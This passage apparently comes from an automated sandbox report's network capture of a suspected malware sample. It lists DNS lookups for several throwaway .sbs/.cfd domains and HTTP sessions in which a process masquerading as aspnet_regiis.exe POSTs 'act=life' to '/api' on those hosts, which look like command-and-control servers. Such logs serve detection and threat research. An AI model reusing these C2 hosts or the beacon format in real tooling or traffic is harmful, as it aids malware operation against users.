                                                                                    Oct 14, 2024 05:01:06.541785955 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.541867018 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.543662071 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.543677092 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.544097900 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.545280933 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.545304060 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.545373917 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.978943110 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.979199886 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.979408979 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.979409933 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:06.979409933 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:07.000916958 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.000961065 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.001130104 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.001303911 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.001311064 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.284244061 CEST49735443192.168.2.4104.21.30.221
                                                                                    Oct 14, 2024 05:01:07.284312010 CEST44349735104.21.30.221192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.481486082 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.481620073 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.483700037 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.483715057 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.484143019 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.485635042 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.485675097 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.485896111 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.883794069 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.884030104 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.884140015 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.886039972 CEST49736443192.168.2.4172.67.141.136
                                                                                    Oct 14, 2024 05:01:07.886063099 CEST44349736172.67.141.136192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.921653986 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:07.921746016 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.921855927 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:07.934273958 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:07.934385061 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.433384895 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.433757067 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.435924053 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.435976982 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.436491013 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.437886000 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.437933922 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.438031912 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.867278099 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.867602110 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.867830992 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.867830992 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.867924929 CEST49737443192.168.2.4188.114.96.3
                                                                                    Oct 14, 2024 05:01:08.867969036 CEST44349737188.114.96.3192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.888263941 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:08.888361931 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.888474941 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:08.889017105 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:08.889096975 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:09.616211891 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:09.616439104 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:09.618679047 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:09.618716002 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:09.619225025 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:09.621045113 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:09.667408943 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.165508032 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.165540934 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.165635109 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.165636063 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.165704012 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.165771961 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.165821075 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.165844917 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.297029018 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.297058105 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.297348022 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.297379017 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.297813892 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.303484917 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.303601027 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.303738117 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.303739071 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.303934097 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.303934097 CEST49738443192.168.2.4104.102.49.254
                                                                                    Oct 14, 2024 05:01:10.303981066 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.304008961 CEST44349738104.102.49.254192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.467381954 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:10.467521906 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.467617035 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:10.468162060 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:10.468234062 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.010042906 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.010260105 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.141486883 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.141571999 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.142704964 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.144808054 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.144808054 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.145263910 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254239082 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254368067 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254460096 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254543066 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254566908 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.254641056 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254682064 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.254776001 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.254853010 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.295228958 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.295229912 CEST49739443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.295301914 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.295336962 CEST44349739104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.481199026 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.481297970 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.481426954 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.481786966 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.481847048 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.985675097 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.985975027 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.988033056 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.988085032 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.988610983 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:11.989753962 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.989753962 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:11.989928007 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:12.869415045 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:12.869883060 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:12.870233059 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:12.870337963 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:12.870337963 CEST49740443192.168.2.4104.21.53.8
                                                                                    Oct 14, 2024 05:01:12.870383978 CEST44349740104.21.53.8192.168.2.4
                                                                                    Oct 14, 2024 05:01:12.870417118 CEST44349740104.21.53.8192.168.2.4
                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                    Oct 14, 2024 05:01:00.933569908 CEST6029653192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:00.947138071 CEST53602961.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:01.983944893 CEST5898253192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:01.997823000 CEST53589821.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:02.992424011 CEST5146653192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:03.001410961 CEST53514661.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.030095100 CEST6177953192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:03.042893887 CEST53617791.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:03.965677023 CEST6382053192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:03.977453947 CEST53638201.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:04.964185953 CEST6041053192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:04.978408098 CEST53604101.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.027034998 CEST5113953192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:06.039587021 CEST53511391.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:06.988332033 CEST5536853192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:07.000262022 CEST53553681.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:07.888189077 CEST4953353192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:07.901117086 CEST53495331.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:08.880698919 CEST5122853192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:08.887504101 CEST53512281.1.1.1192.168.2.4
                                                                                    Oct 14, 2024 05:01:10.305464983 CEST5342353192.168.2.41.1.1.1
                                                                                    Oct 14, 2024 05:01:10.466274023 CEST53534231.1.1.1192.168.2.4
                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                    Oct 14, 2024 05:01:00.933569908 CEST192.168.2.41.1.1.10xe1c4Standard query (0)passimovrt.cfdA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:01.983944893 CEST192.168.2.41.1.1.10x1395Standard query (0)mathcucom.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:02.992424011 CEST192.168.2.41.1.1.10xfad2Standard query (0)allocatinow.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.030095100 CEST192.168.2.41.1.1.10x9542Standard query (0)enlargkiw.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.965677023 CEST192.168.2.41.1.1.10x4847Standard query (0)resinedyw.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:04.964185953 CEST192.168.2.41.1.1.10x385Standard query (0)vennurviot.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:06.027034998 CEST192.168.2.41.1.1.10xfc47Standard query (0)ehticsprocw.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:06.988332033 CEST192.168.2.41.1.1.10x9137Standard query (0)condifendteu.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:07.888189077 CEST192.168.2.41.1.1.10x2908Standard query (0)drawwyobstacw.sbsA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:08.880698919 CEST192.168.2.41.1.1.10xe2efStandard query (0)steamcommunity.comA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:10.305464983 CEST192.168.2.41.1.1.10xf327Standard query (0)sergei-esenin.comA (IP address)IN (0x0001)false
                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                    Oct 14, 2024 05:01:00.947138071 CEST1.1.1.1192.168.2.40xe1c4No error (0)passimovrt.cfd104.21.28.222A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:00.947138071 CEST1.1.1.1192.168.2.40xe1c4No error (0)passimovrt.cfd172.67.147.188A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:01.997823000 CEST1.1.1.1192.168.2.40x1395No error (0)mathcucom.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:01.997823000 CEST1.1.1.1192.168.2.40x1395No error (0)mathcucom.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.001410961 CEST1.1.1.1192.168.2.40xfad2Name error (3)allocatinow.sbsnonenoneA (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.042893887 CEST1.1.1.1192.168.2.40x9542No error (0)enlargkiw.sbs172.67.152.13A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.042893887 CEST1.1.1.1192.168.2.40x9542No error (0)enlargkiw.sbs104.21.33.249A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.977453947 CEST1.1.1.1192.168.2.40x4847No error (0)resinedyw.sbs172.67.205.156A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:03.977453947 CEST1.1.1.1192.168.2.40x4847No error (0)resinedyw.sbs104.21.77.78A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:04.978408098 CEST1.1.1.1192.168.2.40x385No error (0)vennurviot.sbs104.21.46.170A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:04.978408098 CEST1.1.1.1192.168.2.40x385No error (0)vennurviot.sbs172.67.140.193A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:06.039587021 CEST1.1.1.1192.168.2.40xfc47No error (0)ehticsprocw.sbs104.21.30.221A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:06.039587021 CEST1.1.1.1192.168.2.40xfc47No error (0)ehticsprocw.sbs172.67.173.224A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:07.000262022 CEST1.1.1.1192.168.2.40x9137No error (0)condifendteu.sbs172.67.141.136A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:07.000262022 CEST1.1.1.1192.168.2.40x9137No error (0)condifendteu.sbs104.21.79.35A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:07.901117086 CEST1.1.1.1192.168.2.40x2908No error (0)drawwyobstacw.sbs188.114.96.3A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:07.901117086 CEST1.1.1.1192.168.2.40x2908No error (0)drawwyobstacw.sbs188.114.97.3A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:08.887504101 CEST1.1.1.1192.168.2.40xe2efNo error (0)steamcommunity.com104.102.49.254A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:10.466274023 CEST1.1.1.1192.168.2.40xf327No error (0)sergei-esenin.com104.21.53.8A (IP address)IN (0x0001)false
                                                                                    Oct 14, 2024 05:01:10.466274023 CEST1.1.1.1192.168.2.40xf327No error (0)sergei-esenin.com172.67.206.204A (IP address)IN (0x0001)false
                                                                                    • passimovrt.cfd
                                                                                    • mathcucom.sbs
                                                                                    • enlargkiw.sbs
                                                                                    • resinedyw.sbs
                                                                                    • vennurviot.sbs
                                                                                    • ehticsprocw.sbs
                                                                                    • condifendteu.sbs
                                                                                    • drawwyobstacw.sbs
                                                                                    • steamcommunity.com
                                                                                    • sergei-esenin.com
                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    0192.168.2.449730104.21.28.222443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:01 UTC261OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: passimovrt.cfd
                                                                                    2024-10-14 03:01:01 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:01 UTC827INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:01 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=9u0qp4od9oo0fsj88504mr4igg; expires=Thu, 06 Feb 2025 20:47:40 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=r5KqwKz7xhoXXtIdbLFOyTt%2FUoOX1HI3YTgn8AzHSg7f3Y9G40%2BN4Kx%2FGckPs7lKekhOaILOMpoyLXjI5SJr6%2BdlO5iuvz7%2FEHULiRE98CQ6GNMryGtxcTNOawyjEnsRLA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d24528ced05c341-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:01 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:01 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    1192.168.2.449731188.114.96.3443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:02 UTC260OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: mathcucom.sbs
                                                                                    2024-10-14 03:01:02 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:02 UTC817INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:02 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=95d2pfud9k1f0da97epsksr0h9; expires=Thu, 06 Feb 2025 20:47:41 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=9UrlddkwqSmcZpXxi7mPXPx5xliU%2FU2kKXWIq2JicOVMzmqr8ypxNdLXY7VOd8fM0SDt9wt53fYvO3NPXdquUnm00crb8ghCoEwbE%2FXZEVry8YJ%2FHEdZVm2Y5iF7SB%2Fl"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d24529318228cc3-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:02 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:02 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    2192.168.2.449732172.67.152.13443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:03 UTC260OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: enlargkiw.sbs
                                                                                    2024-10-14 03:01:03 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:03 UTC823INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:03 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=33nu5usg8mj27ndfuinpsqhu58; expires=Thu, 06 Feb 2025 20:47:42 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=CfN7%2BUV68moyr%2F%2FQjZ4jGxhBBnOCdnzFpZYvxQ00dAlgQNNryKIfd24qWZxZh%2BeawZfoVr2aTzlL3hTKVhHAYFJnFBJGpt%2F7B7oOiui%2BCzGPIf7qMkWCz6BE%2BN6ow321"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d2452997ab70f49-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:03 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    3192.168.2.449733172.67.205.156443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:04 UTC260OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
                                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                    Content-Length: 8
                                                                                    Host: resinedyw.sbs
                                                                                    2024-10-14 03:01:04 UTC8OUTData Raw: 61 63 74 3d 6c 69 66 65
                                                                                    Data Ascii: act=life
                                                                                    2024-10-14 03:01:04 UTC813INHTTP/1.1 200 OK
                                                                                    Date: Mon, 14 Oct 2024 03:01:04 GMT
                                                                                    Content-Type: text/html; charset=UTF-8
                                                                                    Transfer-Encoding: chunked
                                                                                    Connection: close
                                                                                    Set-Cookie: PHPSESSID=m9uggeuln1bpi8j2uucg2mlt8n; expires=Thu, 06 Feb 2025 20:47:43 GMT; Max-Age=9999999; path=/
                                                                                    Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                    Cache-Control: no-store, no-cache, must-revalidate
                                                                                    Pragma: no-cache
                                                                                    cf-cache-status: DYNAMIC
                                                                                    vary: accept-encoding
                                                                                    Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=hcIgb8kKKJIGsgxyEIvBUja3HdY3EAyr8XI8XVLGJJnii7LgSh2DJAGtUNJt9w45Agvtliv7Nz1ClkOYYWB4VbUTcEK2Bb3oV%2FRtHRn6cKEubF0NqIe8z5X%2B1iLnnobV"}],"group":"cf-nel","max_age":604800}
                                                                                    NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                    Server: cloudflare
                                                                                    CF-RAY: 8d24529f58ed42fb-EWR
                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                    2024-10-14 03:01:04 UTC15INData Raw: 61 0d 0a 65 72 72 6f 72 20 23 44 31 32 0d 0a
                                                                                    Data Ascii: aerror #D12
                                                                                    2024-10-14 03:01:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                    Data Ascii: 0


                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                    4192.168.2.449734104.21.46.170443280C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_regiis.exe
                                                                                    TimestampBytes transferredDirectionData
                                                                                    2024-10-14 03:01:05 UTC261OUTPOST /api HTTP/1.1
                                                                                    Connection: Keep-Alive
                                                                                    Content-Type: application/x-www-form-urlencoded
